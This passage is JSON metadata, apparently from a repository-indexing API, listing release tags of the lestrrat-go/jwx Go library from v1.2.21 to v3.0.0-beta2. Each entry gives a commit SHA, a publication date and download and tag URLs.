-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/